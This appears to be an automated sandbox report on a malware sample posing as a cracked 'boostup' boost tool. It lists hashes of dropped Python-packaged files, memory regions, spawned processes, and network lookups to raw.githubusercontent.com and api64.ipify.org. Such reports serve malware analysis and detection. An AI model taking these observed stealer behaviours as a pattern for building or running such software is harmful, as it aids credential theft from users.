C:\Users\Admin\AppData\Local\Temp\_MEI31002\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI31002\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI31002\blank.aes

MD5 7a959f835f18413a62817c2a945276ce
SHA1 3d77b773782ee5305486efed0286efe23f812443
SHA256 ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c
SHA512 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

memory/1404-50-0x00007FF94DC90000-0x00007FF94DC9F000-memory.dmp

memory/1404-49-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI31002\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI31002\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI31002\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI31002\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI31002\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI31002\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI31002\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI31002\bound.blank

MD5 7705111a97e722d4bb4a0b91d8a6b55f
SHA1 474b52afdd55503fb2f3c2ca7c53824e8785ede8
SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224
SHA512 c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4

memory/1404-56-0x00007FF951300000-0x00007FF95132D000-memory.dmp

memory/1404-62-0x00007FF949080000-0x00007FF9491F7000-memory.dmp

memory/1404-61-0x00007FF94B680000-0x00007FF94B6A3000-memory.dmp

memory/1404-58-0x00007FF9512E0000-0x00007FF9512F9000-memory.dmp

memory/1404-66-0x00007FF94B430000-0x00007FF94B43D000-memory.dmp

memory/1404-65-0x00007FF94B460000-0x00007FF94B479000-memory.dmp

memory/1404-73-0x00007FF939470000-0x00007FF939990000-memory.dmp

memory/1404-74-0x00000278A0EB0000-0x00000278A13D0000-memory.dmp

memory/1404-72-0x00007FF949530000-0x00007FF9495FD000-memory.dmp

memory/1404-71-0x00007FF94A930000-0x00007FF94A963000-memory.dmp

memory/1404-76-0x00007FF94ABC0000-0x00007FF94ABD4000-memory.dmp

memory/1404-78-0x00007FF949FD0000-0x00007FF949FDD000-memory.dmp

memory/1404-81-0x00007FF939F50000-0x00007FF93A06C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pha25yyv.gq5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/940-82-0x000001C3E8920000-0x000001C3E8942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 84aede3aa04bb514b90dcb124d948e1f
SHA1 8a0c6a152050a2f6cc0601b2a5c59f5f6c908c17
SHA256 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da
SHA512 38c88dbbad0abb249d5ee362a2393bdc63f78a09497e2a012f473ceef59b45de00dddac74dc001cc04a03352baec13aeaffbc587e96bc05de24fa7647e84088a

memory/1404-103-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

memory/3264-111-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-118-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-121-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-119-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-120-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-122-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/3264-123-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe

MD5 5a796657b6f3717a1d30cd47d29f776a
SHA1 2d87d2b839845709d122d9464b77bb5c25d410f9
SHA256 c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159
SHA512 29efda3f2c7e8e0aa406959e9b71b826c51e0dca66282320109cadb87f04ec2744a6e08cec8f87c2f2a5ea334c3a59d7eb697edd667ff0f49974f29a74fc908d

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\psutil\_psutil_windows.pyd

MD5 ebefbc98d468560b222f2d2d30ebb95c
SHA1 ee267e3a6e5bed1a15055451efcccac327d2bc43
SHA256 67c17558b635d6027ddbb781ea4e79fc0618bbec7485bd6d84b0ebcd9ef6a478
SHA512 ab9f949adfe9475b0ba8c37fa14b0705923f79c8a10b81446abc448ad38d5d55516f729b570d641926610c99df834223567c1efde166e6a0f805c9e2a35556e3

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\python3.dll

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

memory/392-293-0x0000019C589E0000-0x0000019C589E8000-memory.dmp

memory/1404-305-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

memory/1404-319-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

memory/1404-315-0x00007FF939470000-0x00007FF939990000-memory.dmp

memory/1404-314-0x00007FF949530000-0x00007FF9495FD000-memory.dmp

memory/1404-313-0x00007FF94A930000-0x00007FF94A963000-memory.dmp

memory/1404-311-0x00007FF94B460000-0x00007FF94B479000-memory.dmp

memory/1404-310-0x00007FF949080000-0x00007FF9491F7000-memory.dmp

memory/1404-304-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

memory/1404-318-0x00007FF939F50000-0x00007FF93A06C000-memory.dmp

memory/1404-309-0x00007FF94B680000-0x00007FF94B6A3000-memory.dmp

memory/3264-369-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/1404-391-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

memory/1404-404-0x00007FF939F50000-0x00007FF93A06C000-memory.dmp

memory/1404-403-0x00007FF949FD0000-0x00007FF949FDD000-memory.dmp

memory/1404-402-0x00007FF94ABC0000-0x00007FF94ABD4000-memory.dmp

memory/1404-400-0x00007FF949530000-0x00007FF9495FD000-memory.dmp

memory/1404-399-0x00007FF94A930000-0x00007FF94A963000-memory.dmp

memory/1404-398-0x00007FF94B430000-0x00007FF94B43D000-memory.dmp

memory/1404-397-0x00007FF94B460000-0x00007FF94B479000-memory.dmp

memory/1404-396-0x00007FF949080000-0x00007FF9491F7000-memory.dmp

memory/1404-401-0x00007FF939470000-0x00007FF939990000-memory.dmp

memory/1404-395-0x00007FF94B680000-0x00007FF94B6A3000-memory.dmp

memory/1404-394-0x00007FF9512E0000-0x00007FF9512F9000-memory.dmp

memory/1404-393-0x00007FF951300000-0x00007FF95132D000-memory.dmp

memory/1404-392-0x00007FF94DC90000-0x00007FF94DC9F000-memory.dmp

memory/1404-390-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-22 13:59

Reported

2024-06-22 14:02

Platform

win10v2004-20240508-en

Max time kernel

76s

Max time network

71s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api64.ipify.org N/A N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 api64.ipify.org udp

Files

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe

MD5 49d08125658272ff5c325f8789b6e6ee
SHA1 33629d347573c8ae2c7f34fadf70cd91fdb4dcb2
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c
SHA512 68ba097ccc0d324ac9ec43f9ab3056e4c7d05519a69353994062b60ad44a0d31955a8845b5e4d2fdfa90b7646d552a30e56ec4746dae521fe05b74f248ce43f0

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\yaml\_yaml.pyd

MD5 e383f5064e9afe76cd25b49d00ffa275
SHA1 5073f97495ae0694bf79865852eda271a309f50f
SHA256 a0c62c035cd131ce1e574742d91d415de761a5c5d5c35a4f36a41b8e0b0ab195
SHA512 34c4b567c628d0c14f330dae8dd069b08940e087666666db9aa4497680f3111ab580f4ac702d726a7d6ab85fd4e9b27a952800a2b5271edb50374a30f15bc5b5

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 22c4892caf560a3ee28cf7f210711f9e
SHA1 b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256 e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512 edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tls_client\dependencies\tls-client-64.dll

MD5 6b0b5bb89d4fab802687372d828321b4
SHA1 a6681bee8702f7abbca891ac64f8c4fb7b35fbb5
SHA256 ec4f40c5f1ac709313b027c16face4d83e0dafdbc466cff2ff5d029d00600a20
SHA512 50c857f4a141ad7db8b6d519277033976bf97c9a7b490186a283403c05cb83b559a596efaf87ca46bc66bdf6b80636f4622324551c9de2c26bebfdbb02209d34

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_socket.pyd

MD5 2c0ec225e35a0377ac1d0777631bffe4
SHA1 7e5d81a06ff8317af52284aedccac6ebace5c390
SHA256 301c47c4016dac27811f04f4d7232f24852ef7675e9a4500f0601703ed8f06af
SHA512 aea9d34d9e93622b01e702defd437d397f0e7642bc5f9829754d59860b345bbde2dd6d7fe21cc1d0397ff0a9db4ecfe7c38b649d33c5c6f0ead233cb201a73e0

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

MD5 bfc834bb2310ddf01be9ad9cff7c2a41
SHA1 fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA256 41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
SHA512 6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_lzma.pyd

MD5 d386b7c4dcf589e026abfc7196cf1c4c
SHA1 c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256 ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA512 78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_queue.pyd

MD5 50842ce7fcb1950b672d8a31c892a5d1
SHA1 d84c69fa2110b860da71785d1dbe868bd1a8320f
SHA256 06c36ec0749d041e6957c3cd7d2d510628b6abe28cee8c9728412d9ce196a8a2
SHA512 c1e686c112b55ab0a5e639399bd6c1d7adfe6aedc847f07c708bee9f6f2876a1d8f41ede9d5e5a88ac8a9fbb9f1029a93a83d1126619874e33d09c5a5e45a50d

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\_asyncio.pyd

MD5 cee78dc603d57cb2117e03b2c0813d84
SHA1 095c98ca409e364b8755dc9cfd12e6791bf6e2b8
SHA256 6306be660d87ffb2271dd5d783ee32e735a792556e0b5bd672dc0b1c206fdadc
SHA512 7258560aa557e3e211bb9580add604b5191c769594e17800b2793239df45225a82ce440a6b9dcf3f2228ed84712912affe9bf0b70b16498489832df2dee33e7e

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 78d9dd608305a97773574d1c0fb10b61
SHA1 9e177f31a3622ad71c3d403422c9a980e563fe32
SHA256 794d039ffdf277c047e26f2c7d58f81a5865d8a0eb7024a0fac1164fea4d27cf
SHA512 0c2d08747712ed227b4992f6f8f3cc21168627a79e81c6e860ee2b5f711af7f4387d3b71b390aa70a13661fc82806cc77af8ab1e8a8df82ad15e29e05fa911bf

